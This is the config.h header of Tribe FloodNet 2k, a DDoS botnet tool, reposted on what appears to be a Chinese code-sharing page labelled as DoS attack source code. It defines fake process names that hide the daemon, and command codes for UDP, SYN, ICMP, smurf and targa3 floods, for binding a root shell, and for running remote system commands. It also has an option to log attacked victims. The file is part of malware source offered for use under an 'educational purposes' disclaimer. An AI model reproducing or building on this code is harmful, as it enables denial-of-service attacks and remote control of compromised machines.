config.h

来自「DOS攻击源码」· C头文件 代码 · 共 44 行

H
44
字号
/* * Tribe FloodNet - 2k edition * by Mixter <mixter@newyorkoffice.com> * * config.h - user defined values * * This program is distributed for educational purposes and without any * explicit or implicit warranty; in no event shall the author or * contributors be liable for any direct, indirect or incidental damages * arising in any way out of the use of this software. * */#ifndef _CONFIG_H#define HIDEME "tfn-daemon"	/* background process name */#define HIDEKIDS "tfn-child"	/* flood/shell thread names */#define CHLD_MAX 50		/* maximum targets a server handles at a time */#define DELIMITER "@"		/* to separate ips and broadcasts (host1@host2@...) */#define REQUIRE_PASS		/* require server password to be entered and				   verified before the client will work? */#undef ATTACKLOG "attack.log"	/* keep server side logs of attacked victims *//* Note: the password is not defined here, but at compile time. The   requests will be encrypted anyways, you DON'T need to change this */#define PROTO_SEP	'+'	/* session header separator, can be anything */#define ID_SHELL	'a'	/* to bind a root shell */#define ID_PSIZE	'b'	/* to change size of udp/icmp packets */#define ID_SWITCH	'c'	/* to switch spoofing mode */#define ID_STOPIT	'd'	/* to stop flooding */#define ID_SENDUDP	'e'	/* to udp flood */#define ID_SENDSYN	'f'	/* to syn flood */#define ID_SYNPORT	'g'	/* to set port */#define ID_ICMP		'h'	/* to icmp flood */#define ID_SMURF	'i'	/* haps! haps! */#define ID_TARGA	'j'	/* targa3 (ip stack penetration) */#define ID_MIX		'k'	/* udp/syn/icmp intervals */#define ID_REXEC	'l'	/* execute system command */#define _CONFIG_H#endif

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?